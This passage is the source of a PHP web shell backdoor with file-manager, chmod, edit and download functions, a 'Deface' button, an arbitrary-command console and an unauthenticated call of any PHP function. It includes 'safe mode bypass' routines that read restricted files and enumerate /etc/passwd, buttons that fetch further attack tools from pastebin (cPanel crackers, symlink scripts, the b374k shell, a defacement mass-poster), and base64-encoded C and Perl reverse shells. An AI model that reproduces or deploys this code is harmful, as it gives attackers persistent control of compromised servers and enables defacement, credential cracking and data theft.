  698. @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
  699. }
  700. unset($_SESSION['f']);
  701. break;
  702. default:
  703. if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {
  704. $_SESSION['act'] = @$_POST['p1'];
  705. $_SESSION['f'] = @$_POST['f'];
  706. foreach($_SESSION['f'] as $k => $f)
  707. $_SESSION['f'][$k] = urldecode($f);
  708. $_SESSION['cwd'] = @$_POST['c'];
  709. }
  710. break;
  711. }
  712. echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>';
  713. }
  714.  
  715. $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
  716. if($dirContent === false) { echo 'Can\'t open this folder!'; return; }
  717. global $sort;
  718. $sort = array('name', 1);
  719. if(!empty($_POST['p1'])) {
  720. if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
  721. $sort = array($match[1], (int)$match[2]);
  722. }
  723. echo '<script>
  724. function sa() {
  725. for(i=0;i<document.files.elements.length;i++)
  726. if(document.files.elements[i].type == \'checkbox\')
  727. document.files.elements[i].checked = document.files.elements[0].checked;
  728. }
  729. </script>
  730. <table width=\'100%\' class=\'main\' cellspacing=\'0\' cellpadding=\'2\'>
  731. <form name=files method=post>';
  732. echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
  733. $dirs = $files = $links = array();
  734. $n = count($dirContent);
  735. for($i=0;$i<$n;$i++) {
  736. $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
  737. $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
  738. $tmp = array('name' => $dirContent[$i],
  739. 'path' => $GLOBALS['cwd'].$dirContent[$i],
  740. 'modify' => @date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
  741. 'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
  742. 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
  743. 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
  744. 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
  745. );
  746. if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
  747. $files[] = array_merge($tmp, array('type' => 'file'));
  748. elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
  749. $links[] = array_merge($tmp, array('type' => 'link'));
  750. elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
  751. $dirs[] = array_merge($tmp, array('type' => 'dir'));
  752. }
  753. $GLOBALS['sort'] = $sort;
  754. function cmp($a, $b) {
  755. if($GLOBALS['sort'][0] != 'size')
  756. return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
  757. else
  758. return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
  759. }
  760. usort($files, "cmp");
  761. usort($dirs, "cmp");
  762. usort($links, "cmp");
  763. $files = array_merge($dirs, $links, $files);
  764. $l = 0;
  765. foreach($files as $f) {
  766. echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
  767. .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
  768. $l = $l?0:1;
  769. }
  770. echo '<tr><td colspan=5>
  771. <input type=hidden name=a value=\'FilesMan\'>
  772. <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
  773. <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  774. <select name=\'p1\'><option value=\'copy\'>Copy</option><option value=\'move\'>Move</option><option value=\'delete\'>Delete</option>';
  775. if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){echo '<option value=\'paste\'>Paste</option>'; }
  776. echo '</select>&nbsp;<input type="submit" value=">>"></td><td colspan="2" align="right" width="1"><input name="def" id="def" value="index.php" size="10"/>&nbsp;<input type="button" onclick="g(\'FilesMan\',\''.htmlspecialchars($GLOBALS['cwd']).'\',\'deface\',document.getElementById(\'def\').value)" value="Add your Deface"></td></tr>
  777. </form></table></div>';
  778. printFooter();
  779. }
  780.  
  781. function actionStringTools() {
  782. if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
  783. if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
  784. if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p[$i]));return strtoupper($r);}}
  785. if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
  786.  
  787. if(isset($_POST['ajax'])) {
  788. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
  789. ob_start();
  790. if(function_exists($_POST['p1']))
  791. echo $_POST['p1']($_POST['p2']);
  792. $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
  793. echo strlen($temp), "\n", $temp;
  794. exit;
  795. }
  796. printHeader();
  797. echo '<h1>String conversions</h1><div class=content>';
  798. $stringTools = array(
  799. 'Base64 encode' => 'base64_encode',
  800. 'Base64 decode' => 'base64_decode',
  801. 'Url encode' => 'urlencode',
  802. 'Url decode' => 'urldecode',
  803. 'Full urlencode' => 'full_urlencode',
  804. 'md5 hash' => 'md5',
  805. 'sha1 hash' => 'sha1',
  806. 'crypt' => 'crypt',
  807. 'CRC32' => 'crc32',
  808. 'ASCII to HEX' => 'ascii2hex',
  809. 'HEX to ASCII' => 'hex2ascii',
  810. 'HEX to DEC' => 'hexdec',
  811. 'HEX to BIN' => 'hex2bin',
  812. 'DEC to HEX' => 'dechex',
  813. 'DEC to BIN' => 'decbin',
  814. 'BIN to HEX' => 'bin2hex',
  815. 'BIN to DEC' => 'bindec',
  816. 'String to lower case' => 'strtolower',
  817. 'String to upper case' => 'strtoupper',
  818. 'Htmlspecialchars' => 'htmlspecialchars',
  819. 'String length' => 'strlen',
  820. );
  821. if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  822. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  823. echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
  824. foreach($stringTools as $k => $v)
  825. echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
  826. echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".htmlspecialchars(@$_POST['p2'])."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
  827. if(!empty($_POST['p1'])) {
  828. if(function_exists($_POST['p1']))
  829. echo htmlspecialchars($_POST['p1']($_POST['p2']));
  830. }
  831. echo"</pre></div>";
  832. printFooter();
  833. }
  834.  
  835. function actionFilesTools() {
  836. if( isset($_POST['p1']) )
  837. $_POST['p1'] = urldecode($_POST['p1']);
  838. if(@$_POST['p2']=='download') {
  839. if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
  840. ob_start("ob_gzhandler", 4096);
  841. header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
  842. if (function_exists("mime_content_type")) {
  843. $type = @mime_content_type($_POST['p1']);
  844. header("Content-Type: ".$type);
  845. }
  846. $fp = @fopen($_POST['p1'], "r");
  847. if($fp) {
  848. while(!@feof($fp))
  849. echo @fread($fp, 1024);
  850. fclose($fp);
  851. }
  852. } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
  853.  
  854. }
  855. exit;
  856. }
  857. if( @$_POST['p2'] == 'mkfile' ) {
  858. if(!file_exists($_POST['p1'])) {
  859. $fp = @fopen($_POST['p1'], 'w');
  860. if($fp) {
  861. $_POST['p2'] = "edit";
  862. fclose($fp);
  863. }
  864. }
  865. }
  866. printHeader();
  867. echo '<h1>File tools</h1><div class=content>';
  868. if( !file_exists(@$_POST['p1']) ) {
  869. echo 'File not exists';
  870. printFooter();
  871. return;
  872. }
  873. $uid = @posix_getpwuid(@fileowner($_POST['p1']));
  874. $gid = @posix_getgrgid(@fileowner($_POST['p1']));
  875. echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
  876. echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
  877. if( empty($_POST['p2']) )
  878. $_POST['p2'] = 'view';
  879. if( is_file($_POST['p1']) )
  880. $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
  881. else
  882. $m = array('Chmod', 'Rename', 'Touch');
  883. foreach($m as $v)
  884. echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
  885. echo '<br><br>';
  886. switch($_POST['p2']) {
  887. case 'view':
  888. echo '<pre class=ml1>';
  889. $fp = @fopen($_POST['p1'], 'r');
  890. if($fp) {
  891. while( !@feof($fp) )
  892. echo htmlspecialchars(@fread($fp, 1024));
  893. @fclose($fp);
  894. }
  895. echo '</pre>';
  896. break;
  897. case 'highlight':
  898. if( is_readable($_POST['p1']) ) {
  899. echo '<div class=ml1 style="background-color: black;color:black;">';
  900. $code = highlight_file($_POST['p1'],true);
  901. echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
  902. }
  903. break;
  904. case 'chmod':
  905. if( !empty($_POST['p3']) ) {
  906. $perms = 0;
  907. for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
  908. $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
  909. if(!@chmod($_POST['p1'], $perms))
  910. echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
  911. else
  912. die('<script>g(null,null,null,null,"")</script>');
  913. }
  914. echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
  915. break;
  916. case 'edit':
  917. if( !is_writable($_POST['p1'])) {
  918. echo 'File isn\'t writeable';
  919. break;
  920. }
  921. if( !empty($_POST['p3']) ) {
  922. @file_put_contents($_POST['p1'],$_POST['p3']);
  923. echo 'Saved!<br><script>document.mf.p3.value="";</script>';
  924. }
  925. echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>';
  926. $fp = @fopen($_POST['p1'], 'r');
  927. if($fp) {
  928. while( !@feof($fp) )
  929. echo htmlspecialchars(@fread($fp, 1024));
  930. @fclose($fp);
  931. }
  932. echo '</textarea><input type=submit value=">>"></form>';
  933. break;
  934. case 'hexdump':
  935. $c = @file_get_contents($_POST['p1']);
  936. $n = 0;
  937. $h = array('00000000<br>','','');
  938. $len = strlen($c);
  939. for ($i=0; $i<$len; ++$i) {
  940. $h[1] .= sprintf('%02X',ord($c[$i])).' ';
  941. switch ( ord($c[$i]) ) {
  942. case 0: $h[2] .= ' '; break;
  943. case 9: $h[2] .= ' '; break;
  944. case 10: $h[2] .= ' '; break;
  945. case 13: $h[2] .= ' '; break;
  946. default: $h[2] .= $c[$i]; break;
  947. }
  948. $n++;
  949. if ($n == 32) {
  950. $n = 0;
  951. if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
  952. $h[1] .= '<br>';
  953. $h[2] .= "\n";
  954. }
  955. }
  956. echo '<table cellspacing=1 cellpadding=5 bgcolor=#red><tr><td bgcolor=red><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#red><pre>'.$h[1].'</pre></td><td bgcolor=#red><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
  957. break;
  958. case 'rename':
  959. if( !empty($_POST['p3']) ) {
  960. if(!@rename($_POST['p1'], $_POST['p3']))
  961. echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>';
  962. else
  963. die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
  964. }
  965. echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
  966. break;
  967. case 'touch':
  968. if( !empty($_POST['p3']) ) {
  969. $time = strtotime($_POST['p3']);
  970. if($time) {
  971. if(@touch($_POST['p1'],$time,$time))
  972. die('<script>g(null,null,null,null,"")</script>');
  973. else {
  974. echo 'Fail!<script>document.mf.p3.value="";</script>';
  975. }
  976. } else echo 'Bad time format!<script>document.mf.p3.value="";</script>';
  977. }
  978. echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
  979. break;
  980. case 'mkfile':
  981.  
  982. break;
  983. }
  984. echo '</div>';
  985. printFooter();
  986. }
  987.  
  988. function actionSafeMode() {
  989. $temp='';
  990. ob_start();
  991. switch($_POST['p1']) {
  992. case 1:
  993. $temp=@tempnam($test, 'cx');
  994. if(@copy("compress.zlib://".$_POST['p2'], $temp)){
  995. echo @file_get_contents($temp);
  996. unlink($temp);
  997. } else
  998. echo 'Sorry... Can\'t open file';
  999. break;
  1000. case 2:
  1001. $files = glob($_POST['p2'].'*');
  1002. if( is_array($files) )
  1003. foreach ($files as $filename)
  1004. echo $filename."\n";
  1005. break;
  1006. case 3:
  1007. $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
  1008. curl_exec($ch);
  1009. break;
  1010. case 4:
  1011. ini_restore("safe_mode");
  1012. ini_restore("open_basedir");
  1013. include($_POST['p2']);
  1014. break;
  1015. case 5:
  1016. for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
  1017. $uid = @posix_getpwuid($_POST['p2']);
  1018. if ($uid)
  1019. echo join(':',$uid)."\n";
  1020. }
  1021. break;
  1022. case 6:
  1023. if(!function_exists('imap_open'))break;
  1024. $stream = imap_open($_POST['p2'], "", "");
  1025. if ($stream == FALSE)
  1026. break;
  1027. echo imap_body($stream, 1);
  1028. imap_close($stream);
  1029. break;
  1030. }
  1031. $temp = ob_get_clean();
  1032. printHeader();
  1033. echo '<h1>Safe mode bypass</h1><div class=content>';
  1034. echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>';
  1035. if($temp)
  1036. echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
  1037. echo '</div>';
  1038. printFooter();
  1039. }
  1040.  
  1041. function actionConsole() {
  1042. if(isset($_POST['ajax'])) {
  1043. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
  1044. ob_start();
  1045. echo "document.cf.cmd.value='';\n";
  1046. $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0"));
  1047. if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
  1048. if(@chdir($match[1])) {
  1049. $GLOBALS['cwd'] = @getcwd();
  1050. echo "document.mf.c.value='".$GLOBALS['cwd']."';";
  1051. }
  1052. }
  1053. echo "document.cf.output.value+='".$temp."';";
  1054. echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
  1055. $temp = ob_get_clean();
  1056. echo strlen($temp), "\n", $temp;
  1057. exit;
  1058. }
  1059. printHeader();
  1060.  
  1061. echo '<script>
  1062. if(window.Event) window.captureEvents(Event.KEYDOWN);
  1063. var cmds = new Array("");
  1064. var cur = 0;
  1065. function kp(e) {
  1066. var n = (window.Event) ? e.which : e.keyCode;
  1067. if(n == 38) {
  1068. cur--;
  1069. if(cur>=0)
  1070. document.cf.cmd.value = cmds[cur];
  1071. else
  1072. cur++;
  1073. } else if(n == 40) {
  1074. cur++;
  1075. if(cur < cmds.length)
  1076. document.cf.cmd.value = cmds[cur];
  1077. else
  1078. cur--;
  1079. }
  1080. }
  1081. function add(cmd) {
  1082. cmds.pop();
  1083. cmds.push(cmd);
  1084. cmds.push("");
  1085. cur = cmds.length-1;
  1086. }
  1087. </script>';
  1088. echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>';
  1089. foreach($GLOBALS['aliases'] as $n => $v) {
  1090. if($v == '') {
  1091. echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
  1092. continue;
  1093. }
  1094. echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
  1095. }
  1096. if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  1097. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  1098. echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;" readonly>';
  1099. if(!empty($_POST['p1'])) {
  1100. echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
  1101. }
  1102. echo '</textarea><input type=text name=cmd style="border-top:1;width:100%;" onkeydown="kp(event);">';
  1103. echo '</form></div><script>document.cf.cmd.focus();</script>';
  1104. printFooter();
  1105. }
  1106.  
  1107. function actionLogout() {
  1108. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  1109. echo '<title>Get out Now</title><body bgcolor=#000000><center><img src="http://i63.tinypic.com/1108vic.jpg"><br>
  1110. <style type="text/css">body, a:hover {cursor: url(http://cur.cursors-4u.net/cursors/cur-11/cur1054.cur), progress !important;}</style><a href="http://www.cursors-4u.com/cursor/2012/02/11/chrome-pointer.html" target="_blank" title="Chrome Pointer"><img src="http://cur.cursors-4u.net/cursor.png" border="0" alt="Chrome Pointer" style="position:absolute; top: 0px; right: 0px;" /></a>
  1111. <span style="color:red;font: 20pt audiowide;">Your are out now :D<br>www.facebook.com/smevkpathan</h2></span></center></body>';
  1112. }
  1113.  
  1114. function actionSelfRemove() {
  1115. printHeader();
  1116. if($_POST['p1'] == 'yes') {
  1117. if(@unlink(SELF_PATH))
  1118. die('Shell has been removed');
  1119. else
  1120. echo 'unlink error!';
  1121. }
  1122. echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
  1123. printFooter();
  1124. }
  1125. ///my editing start here for tools
  1126. function download_remote_file($file_url, $save_to)
  1127. {
  1128. $content = file_get_contents($file_url);
  1129.  
  1130. file_put_contents($save_to, $content);
  1131.  
  1132. }
  1133. if (isset($_POST['dhanush'])) {
  1134. download_remote_file('http://pastebin.com/raw.php?i=U9nqEgRN', realpath("./") . '/dhanush.php');
  1135. header("location:dhanush.php");
  1136.  
  1137. }
  1138. if (isset($_POST['SymlinkbySmevk'])) {
  1139. download_remote_file('http://pastebin.com/raw.php?i=PhSk7Kvq', realpath("./") . '/SymlinkbySmevk.php');
  1140. header("location:SymlinkbySmevk.php");
  1141.  
  1142. }
  1143. if (isset($_POST['SymlinkbyCheetah'])) {
  1144. download_remote_file('http://pastebin.com/raw.php?i=EXejgAMv', realpath("./") . '/SymlinkbyCheetah.php');
  1145. header("location:SymlinkbyCheetah.php");
  1146.  
  1147. }
  1148. if (isset($_POST['SymlinkbyTorjan'])) {
  1149. download_remote_file('http://pastebin.com/raw.php?i=YUg4pXe2', realpath("./") . '/sym.py');
  1150. echo "<script>alert('Script is here /sym.py execute it from there.Type in console (Python sym.py)')</script>";
  1151.  
  1152.  
  1153. }
  1154. if (isset($_POST['CpanelCracker'])) {
  1155. download_remote_file('http://pastebin.com/raw.php?i=zYxsP0MH', realpath("./") . '/CpanelCracker.php');
  1156. header("location:CpanelCracker.php");
  1157.  
  1158. }
  1159. if (isset($_POST['Dblogin'])) {
  1160. download_remote_file('http://pastebin.com/raw.php?i=Q52G9kjJ', realpath("./") . '/Dblogin.php');
  1161. header("location:Dblogin.php");
  1162.  
  1163. }
  1164. if (isset($_POST['CpanelkbyGujjar'])) {
  1165. download_remote_file('http://pastebin.com/raw.php?i=NM9SD9bV', realpath("./") . '/CpanelkbyGujjar.php');
  1166. header("location:CpanelkbyGujjar.php");
  1167.  
  1168. }
  1169. if (isset($_POST['b374k'])) {
  1170. download_remote_file('http://pastebin.com/raw.php?i=1iDZfjZ9', realpath("./") . '/b374k.php');
  1171. header("location:b374k.php");
  1172.  
  1173. }
  1174. if (isset($_POST['ZonehMassPoster'])) {
  1175. download_remote_file('http://pastebin.com/raw.php?i=mDXnSnj2', realpath("./") . '/ZonehMassPoster.php');
  1176. header("location:ZonehMassPoster.php");
  1177.  
  1178. }
  1179. if (isset($_POST['Whmcs'])) {
  1180. download_remote_file('http://pastebin.com/raw.php?i=K0KQWUCk', realpath("./") . '/Whmcs.php');
  1181. header("location:Whmcs.php");
  1182.  
  1183. }
  1184.  
  1185.  
  1186.  
  1187.  
  1188.  
  1189.  
  1190. function actionImportScripts() {
  1191. printHeader();
  1192. echo '<table border="1px" align="center" id ="Smevktools" cellpadding="10" border-color"green"><tr><td>Just click and get the Script :).</td><tr><td>
  1193. <form action ="" method="post">
  1194.  
  1195. <input type = "submit" name="dhanush" value ="Dhanush Shell"></td></tr>';
  1196. echo '<td><form action ="" method="post"><input type = "submit" name="SymlinkbySmevk" value ="Symlink Script By SmEvK_PaThAn"></a></td></tr>';
  1197. echo '<tr><td><form action ="" method="post"><input type = "submit" name="SymlinkbyCheetah" value ="Symlink By Kashmiri Cheetah"></a></td></tr>';
  1198. echo '<tr><td><form action ="" method="post"><input type = "submit" name="SymlinkbyTorjan" value ="Symlink Python Script By Torjan"></a></td></tr>';
  1199. echo '<tr><td><form action ="" method="post"><input type = "submit" name="CpanelCracker" value ="Cpanel Cracker"></a></td></tr>';
  1200. echo '<tr><td><form action ="" method="post"><input type = "submit" name="Dblogin" value ="Database Login Script"></a></td></tr>';
  1201. echo '<tr><td><form action ="" method="post"><input type = "submit" name="CpanelkbyGujjar" value ="Gujjar Pcp Cpanel Cracker"></a></td></tr>';
  1202. echo '<tr><td><form action ="" method="post"><input type = "submit" name="b374k" value ="b374k Shell"></a></td></tr>';
  1203. echo '<tr><td><form action ="" method="post"><input type = "submit" name="ZonehMassPoster" value ="Zone-h Mass Poster"></a></td></tr>';
  1204. echo '<tr><td><form action ="" method="post"><input type = "submit" name="Whmcs" value ="WHMCS KILLER V3"></a></td></tr>';
  1205.  
  1206.  
  1207.  
  1208.  
  1209.  
  1210.  
  1211. printFooter();
  1212. }
  1213.  
  1214.  
  1215. function actionNetwork() {
  1216. printHeader();
  1217. $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
  1218. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
